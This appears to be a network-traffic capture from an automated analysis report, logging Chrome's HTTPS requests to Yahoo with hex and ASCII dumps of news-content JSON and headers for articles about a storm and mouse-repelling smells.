                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 6e 75 6c 6c 7d 2c 22 70 75 62 6c 69 73 68 44 61 74 65 22 3a 22 4d 6f 6e 2c 20 33 30 20 53 65 70 20 32 30 32 34 20 31 32 3a 35 32 3a 35 36 20 47 4d 54 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 22 43 4e 4e 22 2c 22 70 75 62 6c 69 73 68 65 72 4d 65 74 61 22 3a 7b 22 72 65 76 73 70 22 3a 22 63 6e 6e 5f 61 72 74 69 63 6c 65 73 5f 38 37 35 22 7d 2c 22 73 61 6c 69 65 6e 74 45 6e 74 69 74 69 65 73 22 3a 5b 5d 2c 22 73 65 61 72 63 68 4e 6f 49 6e 64 65 78 22 3a 66 61 6c 73 65 2c 22 73 68 61 72 65 49 6d 61 67 65 22 3a 7b 22 77 69 64 74 68 22 3a 39 36 30 2c 22 68 65 69 67 68 74 22 3a 35 34 30 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 7a 65 6e 66 73 2e 63 6f 6d 2f 65 6e 2f 63 6e 6e 5f 61 72 74 69 63 6c 65 73 5f 38 37 35 2f 63 64 35 35 63 35 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: null},"publishDate":"Mon, 30 Sep 2024 12:52:56 GMT","publisher":"CNN","publisherMeta":{"revsp":"cnn_articles_875"},"salientEntities":[],"searchNoIndex":false,"shareImage":{"width":960,"height":540,"url":"https://media.zenfs.com/en/cnn_articles_875/cd55c5c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 61 74 69 6f 6e 61 6c 5f 57 65 61 74 68 65 72 5f 53 65 72 76 69 63 65 22 2c 22 79 63 74 73 22 3a 22 30 30 31 30 30 30 36 35 35 2c 30 30 31 30 30 30 37 38 30 2c 30 30 31 30 30 30 37 39 38 2c 30 30 31 30 30 30 36 33 37 2c 30 30 31 30 30 30 36 35 39 2c 30 30 31 30 30 30 36 35 39 22 2c 22 68 61 73 59 61 68 6f 6f 56 69 64 65 6f 22 3a 74 72 75 65 2c 22 63 6f 6d 6d 65 6e 74 53 65 63 74 69 6f 6e 49 64 22 3a 35 36 36 38 31 34 32 2c 22 68 6f 6d 65 70 61 67 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 6e 65 77 73 2f 6f 6e 65 2d 73 74 6f 72 6d 2d 39 35 2d 64 65 61 64 2d 35 30 30 2d 30 37 30 37 34 33 36 35 38 2e 68 74 6d 6c 22 2c 22 56 55 49 44 22 3a 22 4f 77 72 30 64 6c 68 5f 6e 68 55 57 68 43 4d 71 61 38 30 59 67 41 22 7d 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ational_Weather_Service","ycts":"001000655,001000780,001000798,001000637,001000659,001000659","hasYahooVideo":true,"commentSectionId":5668142,"homepageUrl":"https://www.yahoo.com/news/one-storm-95-dead-500-070743658.html","VUID":"Owr0dlh_nhUWhCMqa80YgA"}}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 45 20 7b 30 7d 20 4d 4f 52 45 5c 22 3a 5c 22 53 65 65 20 7b 30 7d 20 6d 6f 72 65 5c 22 2c 5c 22 53 45 45 5f 4c 45 53 53 5c 22 3a 5c 22 53 65 65 20 6c 65 73 73 5c 22 2c 5c 22 53 45 45 5f 4d 4f 52 45 5c 22 3a 5c 22 53 65 65 20 6d 6f 72 65 5c 22 2c 5c 22 53 48 4f 57 5f 4d 4f 52 45 5c 22 3a 5c 22 53 68 6f 77 20 6d 6f 72 65 20 75 70 64 61 74 65 73 5c 22 2c 5c 22 54 4f 44 41 59 5c 22 3a 5c 22 54 6f 64 61 79 5c 22 2c 5c 22 54 52 59 5f 41 47 41 49 4e 5c 22 3a 5c 22 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 72 79 20 61 67 61 69 6e 5c 22 2c 5c 22 55 50 44 41 54 45 5c 22 3a 5c 22 75 70 64 61 74 65 5c 22 2c 5c 22 55 50 44 41 54 45 53 5c 22 3a 5c 22 75 70 64 61 74 65 73 5c 22 2c 5c 22 56 49 44 45 4f 5f 41 31 31 59 5f 44 49 53 41 42 4c 45 5f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: E {0} MORE\":\"See {0} more\",\"SEE_LESS\":\"See less\",\"SEE_MORE\":\"See more\",\"SHOW_MORE\":\"Show more updates\",\"TODAY\":\"Today\",\"TRY_AGAIN\":\"Something went wrong. Try again\",\"UPDATE\":\"update\",\"UPDATES\":\"updates\",\"VIDEO_A11Y_DISABLE_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 22 3a 33 2c 5c 22 73 6c 69 64 65 73 68 6f 77 43 61 70 74 69 6f 6e 43 6f 6c 6c 61 70 73 65 4c 69 6e 65 43 6f 75 6e 74 5c 22 3a 32 2c 5c 22 75 69 53 68 6f 77 50 72 65 76 69 6f 75 73 42 75 74 74 6f 6e 4f 6e 4c 6f 61 64 5c 22 3a 74 72 75 65 2c 5c 22 70 72 65 73 74 69 67 65 53 63 72 6f 6c 6c 4d 61 72 67 69 6e 54 6f 70 5c 22 3a 2d 37 32 7d 7d 27 20 64 61 74 61 2d 73 70 61 63 65 2d 69 64 3d 31 31 39 37 37 39 32 34 34 36 20 69 64 3d 63 61 61 73 2d 61 72 74 2d 32 62 32 61 32 36 32 63 2d 38 37 38 66 2d 33 66 36 35 2d 39 62 61 36 2d 33 39 61 64 33 37 62 37 38 30 65 62 3e 3c 61 72 74 69 63 6c 65 20 74 61 62 69 6e 64 65 78 3d 2d 31 20 63 6c 61 73 73 3d 63 61 61 73 2d 63 6f 6e 74 61 69 6e 65 72 20 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 3d 63 61 61 73 2d 6c 65 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ":3,\"slideshowCaptionCollapseLineCount\":2,\"uiShowPreviousButtonOnLoad\":true,\"prestigeScrollMarginTop\":-72}}' data-space-id=1197792446 id=caas-art-2b2a262c-878f-3f65-9ba6-39ad37b780eb><article tabindex=-1 class=caas-container aria-labelledby=caas-lea


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    102192.168.2.44986587.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1603OUTGET /caas/content/article/?uuid=8551ac12-1fc9-3d5d-ab15-8e6326882e08,7a673a73-42b0-3bbf-8576-5ad2cdb23c41,73240f47-271e-3691-bf46-85ad4f19d81c&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=900,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1pa4ckpjflnfm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-webp: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-methods: GET, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-length: 141740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    etag: W/"229ac-uoZCRlaArwfdRdP5Huvjrg+W6gQ"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:21:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 7b 22 69 74 65 6d 73 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 22 70 61 72 74 6e 65 72 44 61 74 61 22 3a 7b 22 61 64 4d 65 74 61 22 3a 7b 22 68 61 73 68 74 61 67 22 3a 22 67 61 72 64 65 6e 22 2c 22 69 73 53 75 70 70 6c 79 53 65 67 6d 65 6e 74 22 3a 22 66 61 6c 73 65 22 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 55 53 22 2c 22 72 73 22 3a 22 6c 6d 73 69 64 3a 61 30 61 36 54 30 30 30 30 30 52 30 52 30 74 51 41 46 3b 72 65 76 73 70 3a 74 68 65 5f 73 70 72 75 63 65 5f 31 38 38 3b 6c 70 73 74 61 69 64 3a 38 35 35 31 61 63 31 32 2d 31 66 63 39 2d 33 64 35 64 2d 61 62 31 35 2d 38 65 36 33 32 36 38 38 32 65 30 38 3b 70 74 3a 63 6f 6e 74 65 6e 74 3b 70 64 3a 6d 6f 64 61 6c 3b 76 65 72 3a 6d 65 67 61 73 74 72 6d 3b 70 63 74 3a 73 74 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"garden","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a6T00000R0R0tQAF;revsp:the_spruce_188;lpstaid:8551ac12-1fc9-3d5d-ab15-8e6326882e08;pt:content;pd:modal;ver:megastrm;pct:sto
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC901INData Raw: 5b 7b 22 74 65 72 6d 22 3a 22 57 49 4b 49 49 44 3a 47 65 74 74 79 5f 49 6d 61 67 65 73 22 2c 22 6c 61 62 65 6c 22 3a 22 47 65 74 74 79 20 49 6d 61 67 65 73 22 2c 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 39 36 38 22 2c 22 6d 65 74 61 44 61 74 61 22 3a 5b 7b 22 76 69 73 69 62 6c 65 22 3a 22 66 61 6c 73 65 22 7d 5d 2c 22 73 74 61 72 74 63 68 61 72 22 3a 32 35 37 2c 22 65 6e 64 63 68 61 72 22 3a 32 36 38 2c 22 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 66 69 67 63 61 70 74 69 6f 6e 22 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 66 69 67 63 61 70 74 69 6f 6e 22 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 22 2c 22 6c 61 62 65 6c 22 3a 22 6d 6f 75 73 65 20 70 72 6f 62 6c 65 6d 22 2c 22 63 61 70 41 62 74 53 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: [{"term":"WIKIID:Getty_Images","label":"Getty Images","capAbtScore":"0.968","metaData":[{"visible":"false"}],"startchar":257,"endchar":268,"specialParentTags":["figcaption"],"instanceParentTags":["figcaption"]},{"term":"","label":"mouse problem","capAbtSc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 57 49 4b 49 49 44 3a 44 6f 74 64 61 73 68 5f 4d 65 72 65 64 69 74 68 22 2c 22 6c 61 62 65 6c 22 3a 22 54 68 65 20 53 70 72 75 63 65 22 2c 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 37 32 22 2c 22 6d 65 74 61 44 61 74 61 22 3a 5b 7b 22 76 69 73 69 62 6c 65 22 3a 22 66 61 6c 73 65 22 7d 5d 2c 22 73 74 61 72 74 63 68 61 72 22 3a 32 37 39 32 2c 22 65 6e 64 63 68 61 72 22 3a 32 38 30 31 2c 22 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 66 69 67 63 61 70 74 69 6f 6e 22 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 66 69 67 63 61 70 74 69 6f 6e 22 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 59 43 54 3a 30 30 31 30 30 30 36 33 31 22 2c 22 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ParentTags":[]},{"term":"WIKIID:Dotdash_Meredith","label":"The Spruce","capAbtScore":"0.72","metaData":[{"visible":"false"}],"startchar":2792,"endchar":2801,"specialParentTags":["figcaption"],"instanceParentTags":["figcaption"]},{"term":"YCT:001000631","s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 66 73 2e 63 6f 6d 2f 65 6e 2f 74 68 65 5f 73 70 72 75 63 65 5f 31 38 38 2f 30 31 64 39 30 33 30 32 36 30 63 34 30 65 34 32 37 31 37 37 36 61 31 39 64 38 31 64 63 62 30 64 22 2c 22 61 73 22 3a 22 69 6d 61 67 65 22 7d 5d 2c 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 70 72 65 76 69 65 77 4c 69 6e 6b 22 3a 6e 75 6c 6c 2c 22 70 72 6f 76 69 64 65 72 49 64 22 3a 5b 22 74 68 65 5f 73 70 72 75 63 65 5f 31 38 38 22 5d 2c 22 70 72 6f 76 69 64 65 72 42 72 61 6e 64 22 3a 7b 22 69 64 22 3a 22 38 34 61 37 61 30 39 39 2d 33 32 61 32 2d 33 64 63 34 2d 38 32 36 31 2d 31 66 36 62 36 33 33 38 62 33 66 61 22 2c 22 62 72 61 6e 64 49 64 22 3a 22 74 68 65 5f 73 70 72 75 63 65 22 2c 22 64 69 73 70 6c 61 79 4e 61 6d 65 22 3a 22 54 68 65 20 53 70 72 75 63 65 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: fs.com/en/the_spruce_188/01d9030260c40e4271776a19d81dcb0d","as":"image"}],"presentation":null,"previewLink":null,"providerId":["the_spruce_188"],"providerBrand":{"id":"84a7a099-32a2-3dc4-8261-1f6b6338b3fa","brandId":"the_spruce","displayName":"The Spruce"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 35 35 31 61 63 31 32 2d 31 66 63 39 2d 33 64 35 64 2d 61 62 31 35 2d 38 65 36 33 32 36 38 38 32 65 30 38 22 2c 22 76 69 64 65 6f 50 6f 73 69 74 69 6f 6e 22 3a 22 22 2c 22 77 69 6b 69 69 64 73 22 3a 22 47 65 74 74 79 5f 49 6d 61 67 65 73 2c 53 65 6e 73 65 5f 6f 66 5f 73 6d 65 6c 6c 2c 44 6f 74 64 61 73 68 5f 4d 65 72 65 64 69 74 68 2c 53 70 72 61 79 5f 62 6f 74 74 6c 65 2c 45 75 63 61 6c 79 70 74 75 73 5f 6f 69 6c 22 2c 22 79 63 74 73 22 3a 22 30 30 31 30 30 30 36 33 31 22 2c 22 68 61 73 59 61 68 6f 6f 56 69 64 65 6f 22 3a 66 61 6c 73 65 2c 22 63 6f 6d 6d 65 6e 74 53 65 63 74 69 6f 6e 49 64 22 3a 35 36 36 38 31 34 37 2c 22 68 6f 6d 65 70 61 67 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 6c 69 66 65 73 74 79 6c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 551ac12-1fc9-3d5d-ab15-8e6326882e08","videoPosition":"","wikiids":"Getty_Images,Sense_of_smell,Dotdash_Meredith,Spray_bottle,Eucalyptus_oil","ycts":"001000631","hasYahooVideo":false,"commentSectionId":5668147,"homepageUrl":"https://www.yahoo.com/lifestyle
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 54 5f 4e 4f 57 5c 22 3a 5c 22 4a 75 73 74 20 6e 6f 77 5c 22 2c 5c 22 52 45 4c 4f 41 44 5c 22 3a 5c 22 43 6c 69 63 6b 20 74 6f 20 72 65 6c 6f 61 64 20 77 69 74 68 20 6c 61 74 65 73 74 20 75 70 64 61 74 65 5c 22 2c 5c 22 53 45 45 20 7b 30 7d 20 4d 4f 52 45 5c 22 3a 5c 22 53 65 65 20 7b 30 7d 20 6d 6f 72 65 5c 22 2c 5c 22 53 45 45 5f 4c 45 53 53 5c 22 3a 5c 22 53 65 65 20 6c 65 73 73 5c 22 2c 5c 22 53 45 45 5f 4d 4f 52 45 5c 22 3a 5c 22 53 65 65 20 6d 6f 72 65 5c 22 2c 5c 22 53 48 4f 57 5f 4d 4f 52 45 5c 22 3a 5c 22 53 68 6f 77 20 6d 6f 72 65 20 75 70 64 61 74 65 73 5c 22 2c 5c 22 54 4f 44 41 59 5c 22 3a 5c 22 54 6f 64 61 79 5c 22 2c 5c 22 54 52 59 5f 41 47 41 49 4e 5c 22 3a 5c 22 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 72 79 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: T_NOW\":\"Just now\",\"RELOAD\":\"Click to reload with latest update\",\"SEE {0} MORE\":\"See {0} more\",\"SEE_LESS\":\"See less\",\"SEE_MORE\":\"See more\",\"SHOW_MORE\":\"Show more updates\",\"TODAY\":\"Today\",\"TRY_AGAIN\":\"Something went wrong. Try
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 5c 22 3a 31 33 30 30 2c 5c 22 6c 69 76 65 63 6f 76 65 72 61 67 65 5c 22 3a 7b 5c 22 64 65 66 65 72 5c 22 3a 66 61 6c 73 65 7d 2c 5c 22 69 6d 61 67 65 43 61 70 74 69 6f 6e 43 6f 6c 6c 61 70 73 65 4c 69 6e 65 43 6f 75 6e 74 5c 22 3a 33 2c 5c 22 73 6c 69 64 65 73 68 6f 77 43 61 70 74 69 6f 6e 43 6f 6c 6c 61 70 73 65 4c 69 6e 65 43 6f 75 6e 74 5c 22 3a 32 2c 5c 22 75 69 53 68 6f 77 50 72 65 76 69 6f 75 73 42 75 74 74 6f 6e 4f 6e 4c 6f 61 64 5c 22 3a 74 72 75 65 2c 5c 22 70 72 65 73 74 69 67 65 53 63 72 6f 6c 6c 4d 61 72 67 69 6e 54 6f 70 5c 22 3a 2d 37 32 7d 7d 27 20 64 61 74 61 2d 73 70 61 63 65 2d 69 64 3d 31 31 39 37 37 39 32 34 34 36 20 69 64 3d 63 61 61 73 2d 61 72 74 2d 38 35 35 31 61 63 31 32 2d 31 66 63 39 2d 33 64 35 64 2d 61 62 31 35 2d 38 65 36 33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: \":1300,\"livecoverage\":{\"defer\":false},\"imageCaptionCollapseLineCount\":3,\"slideshowCaptionCollapseLineCount\":2,\"uiShowPreviousButtonOnLoad\":true,\"prestigeScrollMarginTop\":-72}}' data-space-id=1197792446 id=caas-art-8551ac12-1fc9-3d5d-ab15-8e63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 74 5c 22 3a 32 30 2c 5c 22 70 6f 73 69 74 69 6f 6e 54 6f 70 5c 22 3a 2d 31 2c 5c 22 73 68 6f 77 49 6e 66 6f 43 61 72 64 5c 22 3a 66 61 6c 73 65 2c 5c 22 77 69 64 74 68 5c 22 3a 33 30 30 2c 5c 22 74 68 72 65 73 68 6f 6c 64 5c 22 3a 31 30 7d 7d 5c 6e 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 63 6c 61 73 73 3d 63 61 61 73 2d 65 6d 62 65 64 64 65 64 2d 63 6f 6e 66 69 67 20 74 79 70 65 3d 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 7b 5c 22 74 77 69 74 74 65 72 5c 22 3a 7b 5c 22 74 69 6d 65 6f 75 74 5c 22 3a 35 30 30 30 7d 7d 5c 6e 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 62 6f 64 79 2d 77 72 61 70 70 65 72 3e 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: t\":20,\"positionTop\":-1,\"showInfoCard\":false,\"width\":300,\"threshold\":10}}\n </script><script class=caas-embedded-config type=application/json>\n {\"twitter\":{\"timeout\":5000}}\n </script><div class=caas-body-wrapper><button class=\"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 63 61 61 73 2d 61 74 74 72 2d 70 72 6f 76 69 64 65 72 3e 54 68 65 20 53 70 72 75 63 65 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 21 2d 2d 46 2f 2d 2d 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 74 69 74 6c 65 2d 77 72 61 70 70 65 72 3e 3c 68 31 20 69 64 3d 63 61 61 73 2d 6c 65 61 64 2d 68 65 61 64 65 72 2d 38 35 35 31 61 63 31 32 2d 31 66 63 39 2d 33 64 35 64 2d 61 62 31 35 2d 38 65 36 33 32 36 38 38 32 65 30 38 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 68 65 61 64 6c 69 6e 65 3e 31 35 20 53 6d 65 6c 6c 73 20 54 68 61 74 20 4d 69 63 65 20 48 61 74 65 20 74 6f 20 4b 65 65 70 20 54 68 65 6d 20 41 77 61 79 20 46 72 6f 6d 20 59 6f 75 72 20 48 6f 6d 65 20 46 6f 72 20 47 6f 6f 64 3c 2f 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ><span class=caas-attr-provider>The Spruce</span></a></div>...F/--><div class=caas-title-wrapper><h1 id=caas-lead-header-8551ac12-1fc9-3d5d-ab15-8e6326882e08 data-test-locator=headline>15 Smells That Mice Hate to Keep Them Away From Your Home For Good</h


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    103192.168.2.449857152.199.23.1804434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC888OUTGET /tag/opus.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: opus.analytics.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
